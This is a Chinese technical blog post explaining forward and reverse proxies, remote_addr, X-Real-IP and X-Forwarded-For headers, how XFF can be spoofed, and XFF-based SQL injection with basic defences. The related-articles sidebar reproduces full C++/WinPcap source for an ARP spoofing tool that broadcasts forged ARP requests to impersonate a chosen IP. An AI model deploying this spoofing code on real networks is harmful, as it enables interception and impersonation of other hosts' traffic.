正向代理,反向代理及XFF

已于 2022-07-21 14:45:49 修改
阅读量3.6k 收藏 1
点赞数
分类专栏: 网络安全 C++网络编程 文章标签: 服务器 网络
于 2022-07-21 14:25:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44875284/article/details/125907186
版权

1.代理:

        代理可以理解为是一个服务器,它一般作为客户端和服务端的中介。没有代理的情况下客户端的请求直达服务端,而有代理时客户端和服务端的信息通过代理进行交互。就像大城市租房中介一样,租客和房东通过中介来交换信息。

2.正向代理:

        生活中常说的代理(如vpn)一般指正向代理,正向代理的目的一般是隐藏客户端。使用正向代理时客户端的请求全部由服务器代发。我们都知道一般情况下我们的电脑无法访问谷歌,但是如果有一个代理服务器可以访问google而我们也能访问到代理服务器,那么我们就可以使用它来作媒介访问谷歌。此时谷歌只能看到代理服务器,我们的真实ip被隐藏了起来。

        流程简单来看如下:

         一个代理服务器可以为多个服务端服务。

3.反向代理:

        和正向代理相反,反向代理的目的是隐藏服务端。一般当我们访问某度或者某宝的官网时,上面的url不是真实的服务端ip地址。它会将请求发给真实的服务器,然后真实的服务器也通过它与客户端进行交互。

        反向代理流程如下:

        客户端把消息发到代理服务器,代理服务器将消息传给真实服务器。

        正向代理和反向代理可以结合使用,当我们使用正向代理访问谷歌时,谷歌也在进行反向代理。此时流程如下:

 

         这样就做到了同时隐藏客户端和服务端的真实地址。

4.获取真实ip地址:

        我们在实际使用网络时可能经过多层代理,而有一些http头可以记录中间ip或者真实源ip。

4.1 remote_addr和X-Real-IP:

        remote_addr代表直接连接服务器的ip,如果客户端的消息没有经过任何代理传到服务器,那么服务器就会把remote_addr设为客户端的IP,如果使用了代理那么服务器的remote_addr会设为与服务器直连的代理ip。

        remote_addr几乎不可被伪造,因为它是直接从tcp连接的信息获取的,如果伪造那么这个tcp将无法建立(如果从中间的路由器来伪造ip还是有可能建立tcp的,不过这不属于应用层范畴)。

        x-real-ip是一个自定义http头,一般会被设置为emote_addr。它是一个自定义http头。它通常用来记录真实ip。因此x-real-ip也是记录直接连接的ip,因此当经过多级代理时只会记录倒数第二给代理服务器ip,如proxy1-3对应ip为ip1-3,那么最终传到真实服务器会记录ip2,因为ip已经是最后一个代理服务器,没有代理服务器会填它的ip,因此多层代理时 x-real-ip只会记录倒数第二给x-real-ip。但是如果只在proxy1开启x-real-ip,那么最终的http消息只会记录proxy1前也就是客户端的ip。

        一般x-real-ip也不可被伪造。

4.2 x-forwarded-for:

        x-forwarded-for简称XFF,是http协议的一个扩展头部,一般情况下这个头部需要手动开启。

        XFF的格式一般如下:

X-Forwarded-For: client_IP, proxy1_IP, proxy2_IP

        当代理服务器proxy1收到来自client的消息时会往该词条添加client的ip,proxy2收到来自proxy1的消息时会往该词条添加proxy1的ip,同理proxy3会添加proxy2的ip,如果此时proxy3是最后一个代理,直接发往真实的服务器,那么该词条将不会包含proxy3的ip。也就是说在一般情况下XFF不会记录与真实服务器直连的ip,只会记录所有间接相连的ip。

        假如ip为ip0的客户端需要经过proxy1-3三个代理服务器,且它们的ip为ip1-3,那么它们的开启关系对应的XFF内容如下:

#1.proxy1-3均开启XFF
X-Forwarded-For: ip0,ip1,ip2
#2.仅proxy1开启XFF
X-Forwarded-For: ip0
#3.仅proxy2开启XFF
X-Forwarded-For: ip1
#4.仅proxy3开启XFF
X-Forwarded-For: ip2
#5.仅proxy1-2开启XFF
X-Forwarded-For: ip0,ip1
#6.仅proxy1,proxy3开启XFF:
X-Forwarded-For: ip0,ip2
#7.仅proxy2-3开启XFF:
X-Forwarded-For: ip1,ip2

        可以看出XFF开启后代理服务器仅在该词条添加向自己发消息的ip。

4.3 XFF伪造:

        正常情况下有了XFF可以轻松找到每个中间地址,进而找到端地址,但是该消息可以被伪造。

        假定客户端ip为ip0,服务端需要进行两层反向代理,对应的地址为ip1,ip2。那么正常情况应该如下:

X-Forwarded-For: ip0,ip1

        但是假定客户端伪造了一个请求头,如下:

X-Forwarded-For: 假ip1,假ip2

        那么经过代理后就是这样的:

X-Forwarded-For: 假ip1,假ip2,ip0,ip1

         这样服务器就会拿到错误ip。此时由于反向代理服务器和真实服务器是一家,因此可以通过确定反向代理服务器的数量来从后向前找到ip0。也可以在proxy1处理时用remote_addr来覆盖收到的XFF头。

4.4 XFF注入:

        xff注入也是sql注入的一种。XFF注入原理是修改XFF头,使其带有SQL语句,然后对服务器的系统进行sql注入,使服务器执行自定义的SQL命令,从而可以查询网站数据库的信息或篡改删除网站数据库。

        xff防范与sql注入的防范类似,主要都是通过过滤敏感sql字符来实现的。

shldy1999
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
将bin填充0xFF到指定大小(含源码)
01-15
升级flash时,flash大小必须是16M,下载的flash文件有时不足16M,便做了个小工具,将bin填充0xFF到指定大小。
12.xff注入攻击
qq_75121443的博客
11-16 60
黑盒测试下的xff注入攻击。两次结果不一样,存在注入点。
浅谈“XFF注入”
→_→
05-11 5819
漏洞名称: XFF注入、X-Forwarded-for注入 描述: XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。 检测条件: 1.Web业务运行正常 2.HTTP Header中存在X-Forwarded-for参数的调用 检测方法: 假设XFF注入PHP代码如下: 确定漏洞的存在 使用burpsuite工具进行抓包,并用Re
xff_referer-攻防世界
szhangliwenya的博客
03-26 654
题目bp抓包发到重发器题目提示xff和refererX-Forwarded-For(XFF)和Referer都是HTTP请求头字段,它们在Web通信中扮演着重要的角色。X-Forwarded-For(XFF)用于识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址。XFF的主要作用是告诉服务器当前请求者的最终IP。在一些情况下,攻击者可能会尝试伪造X-Forwarded-For字段来隐藏其真实IP地址,因此在使用XFF时需要谨慎验证其真实性。
黑客反向工程
02-16
//ArpCheat.h #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head { unsigned char dest_mac[6]; //目标主机MAC地址 unsigned char source_mac[6]; //源端MAC地址 unsigned short eh_type; //以太网类型 }; struct arp_head { unsigned short hardware_type; //硬件类型:以太网接口类型为1 unsigned short protocol_type; //协议类型:IP协议类型为0X0800 unsigned char add_len; //硬件地址长度:MAC地址长度为6B unsigned char pro_len; //协议地址长度:IP地址长度为4B unsigned short option; //操作:ARP请求为1,ARP应答为2 unsigned char sour_addr[6]; //源MAC地址:发送方的MAC地址 unsigned long sour_ip; //源IP地址:发送方的IP地址 unsigned char dest_addr[6]; //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址 unsigned long dest_ip; //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址 unsigned char padding[18]; }; struct arp_packet //最终arp包结构 { ethernet_head eth; //以太网头部 arp_head arp; //arp数据包头部 }; #pragma pack () /** * 获得网卡的MAC地址 * pDevName 网卡的设备名称 */ unsigned char* GetSelfMac(char* pDevName); /** * 封装ARP请求包 * source_mac 源MAC地址 * srcIP 源IP * destIP 目的IP */ unsigned char* BuildArpPacket(unsigned char* source_mac, unsigned long srcIP, unsigned long destIP); #endif //ArpCheat.cpp #include <stdio.h> #include <pcap.h> #include <conio.h> #include <packet32.h> #include <ntddndis.h> #include "ArpCheat.h" int main(int argc,char* argv[]){ pcap_if_t *alldevs; //全部网卡列表 pcap_if_t *d; //一个网卡 int inum; //用户选择的网卡序号 int i=0; //循环变量 pcap_t *adhandle; //一个pcap实例 char errbuf[PCAP_ERRBUF_SIZE]; //错误缓冲区 unsigned char *mac; //本机MAC地址 unsigned char *packet; //ARP包 unsigned long fakeIp; //要伪装成的IP地址 pcap_addr_t *pAddr; //网卡地址 unsigned long ip; //IP地址 unsigned long netmask; //子网掩码 if(argc!=2){ printf("Usage: %s inet_addr\n",argv[0]); return -1; } //从参数列表获得要伪装的IP地址 fakeIp = inet_addr(argv[1]); if(INADDR_NONE==fakeIp){ fprintf(stderr,"Invalid IP: %s\n",argv[1]); return -1; } /* 获得本机网卡列表 */ if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } /* 打印网卡列表 */ for(d=alldevs; d; d=d->next) { printf("%d", ++i); if (d->description) printf(". %s\n", d->description); else printf(". No description available\n"); } //如果没有发现网卡 if(i==0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return -1; } //请用户选择一个网卡 printf("Enter the interface number (1-%d):",i); scanf("%d", &inum); //如果用户选择的网卡序号超出有效范围,则退出 if(inum < 1 || inum > i) { printf("\nInterface number out of range.\n"); /* Free the device list */ pcap_freealldevs(alldevs); return -1; } /* 移动指针到用户选择的网卡 */ for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); mac = GetSelfMac(d->name+8); //+8以去掉"rpcap://" printf("发送ARP欺骗包,本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s\n", mac[0],mac[1],mac[2],mac[3],mac[4],mac[5],argv[1]); /* 打开网卡 */ if ( (adhandle= pcap_open(d->name, // name of the device 65536, // portion of the packet to capture 0, //open flag 1000, // read timeout NULL, // authentication on the remote machine errbuf // error buffer ) ) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); /* Free the device list */ pcap_freealldevs(alldevs); return -1; } for(pAddr=d->addresses; pAddr; pAddr=pAddr->next){ //得到用户选择的网卡的一个IP地址 ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr; //得到该IP地址对应的子网掩码 netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr; if (!ip || !netmask){ continue; } //看看这个IP和要伪装的IP是否在同一个子网 if((ip&netmask)!=(fakeIp&netmask)){ continue; //如果不在一个子网,继续遍历地址列表 } unsigned long netsize = ntohl(~netmask); //网络中主机数 unsigned long net = ip & netmask; //子网地址 for(unsigned long n=1; n<netsize; n++){ //第i台主机的IP地址,网络字节顺序 unsigned long destIp = net | htonl(n); //构建假的ARP请求包,达到本机伪装成给定的IP地址的目的 packet = BuildArpPacket(mac,fakeIp,destIp); if(pcap_sendpacket(adhandle, packet, 60)==-1){ fprintf(stderr,"pcap_sendpacket error.\n"); } } } return 0; } /** * 获得网卡的MAC地址 * pDevName 网卡的设备名称 */ unsigned char* GetSelfMac(char* pDevName){ static u_char mac[6]; memset(mac,0,sizeof(mac)); LPADAPTER lpAdapter = PacketOpenAdapter(pDevName); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { return NULL; } PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA)); if (OidData == NULL) { PacketCloseAdapter(lpAdapter); return NULL; } // // Retrieve the adapter MAC querying the NIC driver // OidData->Oid = OID_802_3_CURRENT_ADDRESS; OidData->Length = 6; memset(OidData->Data, 0, 6); BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData); if(Status) { memcpy(mac,(u_char*)(OidData->Data),6); } free(OidData); PacketCloseAdapter(lpAdapter); return mac; } /** * 封装ARP请求包 * source_mac 源MAC地址 * srcIP 源IP * destIP 目的IP */ unsigned char* BuildArpPacket(unsigned char* source_mac, unsigned long srcIP,unsigned long destIP) { static struct arp_packet packet; //目的MAC地址为广播地址,FF-FF-FF-FF-FF-FF memset(packet.eth.dest_mac,0xFF,6); //源MAC地址 memcpy(packet.eth.source_mac,source_mac,6); //上层协议为ARP协议,0x0806 packet.eth.eh_type = htons(0x0806); //硬件类型,Ethernet是0x0001 packet.arp.hardware_type = htons(0x0001); //上层协议类型,IP为0x0800 packet.arp.protocol_type = htons(0x0800); //硬件地址长度:MAC地址长度为0x06 packet.arp.add_len = 0x06; //协议地址长度:IP地址长度为0x04 packet.arp.pro_len = 0x04; //操作:ARP请求为1 packet.arp.option = htons(0x0001); //源MAC地址 memcpy(packet.arp.sour_addr,source_mac,6); //源IP地址 packet.arp.sour_ip = srcIP; //目的MAC地址,填充0 memset(packet.arp.dest_addr,0,6); //目的IP地址 packet.arp.dest_ip = destIP; //填充数据,18B memset(packet.arp.padding,0,18); return (unsigned char*)&packet; } VC++ 6.0 中使用WinPcap 下载并安装WinPcap,安装之后在目录”C:\WINDOWS\system32“下WinPcap添加了Packet.dll、wpcap.dll。 增加WinPcap的include和lib路径: Tools→Options→Directories,其中include文件的路径增加WinPcap的include路径(其中有pcap.h等头文件),library文件的路径增加WinPcap的lib路径(其中有Packet.lib和wpcap.lib)。 增加项目的静态链接库: Project→Settings→Link→Object/library Modules,在文本框的末尾添加”wpcap.lib packet.lib ws2_32.lib“。 增加预编译信息: Project→Settings→C/C++→Preprocessor definitions,在文本框的末尾添加”WPCAP,HAVE_REMOTE“。
班长出题 -- funpy (带源码):python反序列化 + ssti + SSRF + remote_addr路由绕过 + url中的#定位符
Zero_Adam的博客
03-11 1576
目录:第五题:一、自己做:二、不足&&学到的:三、学习WP:思路学习:1.绕过get_domain()2.绕过remote_addr() + \#3. 关于反序列化关于python反序列化方法一:exec的方法,(纯属为了复习opcode)方法二、一定有方法二的方法三:用这个变量覆盖的方法(后面的用的是这个方法):4. 接着做 python反序列化 + ssti 第五题: 一、自己做: 做了个der,,, 审计代码差远了, 二、不足&&学到的: 学习了python的反序列化
XFF(X-FORWARDED-FOR)
慎铭的博客
02-03 7399
  XFF(X-FORWARDED-FOR)是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。 格式: X-Forwarded-For: 本机IP, 代理1IP, 代理2IP, 代理3IP ...
XFF与Referer(含实操)
热门推荐
slj1552560的博客
02-16 2万+
Part1:XFF与Referer基本了解 关于xff和referer维基百科: X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。简单地说,xff是告诉服务器当前请求者的最终ip的http请求头字段通常可以直接通过修改http
负载均衡之XFF(X-Forwarded-For)玩法解析
刘东义的博客
10-01 6431
负载均衡在客户场景中,通常客户比较在意访问者的身份要透明,为出现安全问题后,好溯源。那么怎么看呢,一种是负载均衡做了SNAT导致源IP地址都为负载均衡的地址,一种是负载均衡的前端设备比如CDN节点作了SNAT且插入了XFF字段标识客户端IP。对上述的两种情况,以下做了详细说明。 XFF传输模式: 传输客户端IP至后台服务器(适用于本端设备做SNAT场景) 使用HTTP头部携带的IP连接服务器(适用于前端都是CDN节点引流场景) 1、传输客户端IP至后台服务器(配置了SNAT场景,本...
Xff和Refer
HELLOW,文浩
07-26 2785
Xff是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址。在代理转发及反向代理中经常使用X-Forwarded-For 字段。
与上0xFF的意义.zip
06-05
有些人,不太懂,C语言中为什么出现“&0xFF”,它存在的意义是什么,是补零?不会,他只是按位与,没有补零的功效,那到底是什么,这里会告诉你,而且不枉你的5积分!
asp HTTP_X_FORWARDED_FOR和REMOTE_ADDR
01-02
在ASP中使用 Request.ServerVariables(“REMOTE_ADDR”) 来取得客户端的 IP 地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的IP地址,而不是真正的客户端 IP 地址。要想透过代理服务器取得...
linux 下将指定文件以0xFF填充到指定大小源码
01-15
linux 下将指定文件在结尾添加0xFF添加到指定大小(源码)。用法gcc 编译后运行,有帮助命令。4G以上文件未测试。(A:代码风格糟糕注释少,还是没人用的生僻工具,骗分!B:啥~骗分?技术上的事情不叫骗。)
linux 磁盘管理
weixin_42795092的博客
04-29 1112
在mm下新建文件,在文件中输入内容,此内容就被写入第一个分区内,同时mm下会生出lost+found目录,当档案系统发生错误时, 将一些遗失的片段放置到这个目录下。把sdb3挂载到mm,创建文件同时写入内容,查看发现只显示f3,之前挂载的sdb1中的f1不见,代表多个分区可以挂载一个挂载点,但只显示最新挂载的分区。特点:针对不同的数据建立不同的分区,同时为不同的分区创建不同的权限。输入swapon /dev/sdb2,并查看虚拟内存组成分区,两块虚拟内存组成,虚拟内存挂载成功。
WinForms 应用程序中使用 SignalR 连接到服务器
一个专注于技术研究创新的程序员
04-29 383
假设您已经在服务器端实现了名为 SignalRHub 的 SignalR Hub,并且该 Hub 包含了一个名为 SendMessage 的方法,用于接收来自客户端的消息,并将其广播给所有连接的客户端。客户端在收到消息时调用名为 ReceiveMessage 的方法来处理。
Linux下软硬链接和动静态库制作详解
m0_62537611的博客
04-27 838
软硬链接有什么本质区别:有没有独立的inode软链接有独立的inode,所以软链接是一个独立的文件硬链接没有独立的inode,所以硬链接不是一个独立的文件软链接就相当于你在windows下给一个应用创建了一个快捷方式。
【如何使用SSH密钥验证提升服务器安全性及操作效率】(优雅的连接到自己的linux服务器
qq_41308872的博客
04-29 680
本文介绍了如何通过SSH密钥验证提升服务器安全性,以及操作步骤和技巧。从生成密钥对到配置服务器,再到登录操作,逐步讲解,旨在帮助读者理解密钥验证原理,提升系统安全性,同时提高操作效率
【Linux】进程间通信IPC机制
最新发布
Atcxr的博客
04-29 1262
梳理了进程间通信IPC常用的代码框架
python xff
12-01
根据提供的两个引用,可以看出xff是十六进制数的表示方式,通常用于表示二进制数据中的字节。在Python中,可以使用`decode`函数将十六进制字符串转换为二进制数据。下面是两个例子: 1. 将十六进制字符串转换为二进制数据,并用空格分隔每个字节 ```python toSend = "FF F9 FF 00 00 FA FF F7 FF F4 FF F6 FF F7 FF F6 FF FD FF 05 00 03 00 06 00 05 00" result = ' '.join([x.decode('hex') for x in toSend.split()]) print(result) # 输出:b'\xff \xf9 \xff \x00 \x00 \xfa \xff \xf7 \xff \xf4 \xff \xf6 \xff \xf7 \xff \xf6 \xff \xfd \xff \x05 \x00 \x03 \x00 \x06 \x00 \x05 \x00' ``` 2. 将十六进制字符串中的空格去除,并将结果转换为二进制数据 ```python toSend = "FF F9 FF 00 00 FA FF F7 FF F4 FF F6 FF F7 FF F6 FF FD FF 05 00 03 00 06 00 05 00 04 00 06 00 06 00" result = toSend.replace(' ', '').decode('hex') print(result) # 输出:b'\xff\xf9\xff\x00\x00\xfa\xff\xf7\xff\xf4\xff\xf6\xff\xf7\xff\xf6\xff\xfd\xff\x05\x00\x03\x00\x06\x00\x05\x00\x04\x00\x06\x00\x06\x00' ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值